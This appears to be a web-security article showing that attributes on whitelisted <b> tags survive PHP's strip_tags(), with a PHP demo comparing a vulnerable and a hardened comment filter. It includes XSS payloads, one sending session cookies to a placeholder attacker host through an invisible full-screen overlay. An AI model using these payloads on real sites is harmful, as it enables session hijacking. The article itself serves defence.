First: this is NOT a PHP-specific problem. PHP is simply the first language that seemed convenient for showing it.
Objective: Many web pages of newspapers, blogs, product reviews, etc. allow users to add comments. It is a well-known vulnerability to let users include malicious content wherever that is possible. There are many ways to avoid malicious usage, including:
The first is the most secure, but it removes any ability to add bold or italic styling to comments. So webmasters go for solution 2 or 3.
Here is a web page demonstrating how those "innocent" whitelisted elements can be used to attack the user.
Portals usually strip tags with a function that makes sure users can pass only <b> and <i> tags. In PHP this is done with the strip_tags() function or with preg_replace() and friends.
These examples use PHP's strip_tags(), but the same may work with any language and any function. So, better test your systems before others do.
result = strip_tags(arg1, arg2) removes from arg1 everything between < and > except the tags whitelisted in arg2. It does not, however, touch the attributes of the whitelisted tags: an onmouseover or style attribute on an allowed <b> passes through untouched, and that is the whole problem. It is not important whether some other function is used instead of strip_tags(); such functions often have the same weakness. Of course there are always ones which are not vulnerable.
In this example we launch JavaScript when the user moves the mouse pointer over the text "test". This is not the maximum of what can be done: in practice an attacker can use the style attribute to turn this element into a screen-wide transparent canvas, so the user will trigger it anyway.
We read the session cookies and show them to the user. An innocent test, but used later in a different way.
In this example we steal the session cookies (of a logged-in administrator or of other users) and send them to a friendly website. This can be accomplished without any weird behaviour whatsoever: the image can be made 0x0 pixels in size, or any of the other usual tricks apply.
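The following is an added example, not code from the original page. It puts the whitelist filter the page describes next to a hardened variant and runs the three payloads described above (hover, show cookie, steal cookie) through both. The function names, the attacker hostname attacker.example and the payload strings are assumptions made for the demonstration.

```php
<?php
// Added example (not code from the original page). Function names, the
// hostname attacker.example and the payloads are hypothetical.

// Vulnerable: what the page describes portals doing. strip_tags() drops
// every disallowed tag but leaves all attributes on the allowed <b>/<i>.
function filter_vulnerable(string $comment): string
{
    return strip_tags($comment, '<b><i>');
}

// Hardened: escape everything first, then re-enable only the bare tags
// <b>, </b>, <i>, </i>. A tag carrying any attribute stays escaped text,
// so on* handlers and style never reach the browser as markup.
function filter_hardened(string $comment): string
{
    $escaped = htmlspecialchars($comment, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return preg_replace('#&lt;(/?)([bi])&gt;#i', '<$1$2>', $escaped);
}

// Check used below: does the output still contain a <b ...> or <i ...>
// tag that carries attributes (anything after the tag name)?
function has_attributed_tag(string $html): bool
{
    return preg_match('#<[bi]\s+[^>]*>#i', $html) === 1;
}

// Constructed payloads mirroring the page's three examples.
$payloads = [
    // 1. run script when the pointer passes over "test"
    'hover'       => '<b onmouseover="alert(1)">test</b>',
    // 2. show the visitor their own cookies
    'show_cookie' => '<b onmouseover="alert(document.cookie)">test</b>',
    // 3. send the cookies to the attacker via an image request; the element
    //    is stretched over the whole viewport and made invisible, so any
    //    mouse movement triggers it without the user noticing
    'exfil'       => '<b style="position:fixed;top:0;left:0;width:100%;height:100%;opacity:0"'
                   . ' onmouseover="new Image().src='
                   . "'https://attacker.example/c?'+encodeURIComponent(document.cookie)\">"
                   . 'test</b>',
];

foreach ($payloads as $name => $p) {
    $v = filter_vulnerable($p);
    $h = filter_hardened($p);
    echo "== $name ==\n";
    echo "vulnerable: $v\n";
    echo "  still dangerous: " . (has_attributed_tag($v) ? 'yes' : 'no') . "\n";
    echo "hardened:   $h\n";
    echo "  still dangerous: " . (has_attributed_tag($h) ? 'yes' : 'no') . "\n\n";
}
// With strip_tags() every payload comes out unchanged ("still dangerous: yes");
// the hardened filter emits the attribute-bearing tags as inert escaped text.
```

The hardened variant deliberately does not try to parse or clean attributes; it only ever emits the four fixed strings <b>, </b>, <i>, </i>, which is the smallest surface that still gives users bold and italic. Apply the same idea to any whitelist filter in any language: whitelisting a tag name is not enough unless attributes on that tag are removed or the tag is re-emitted from scratch.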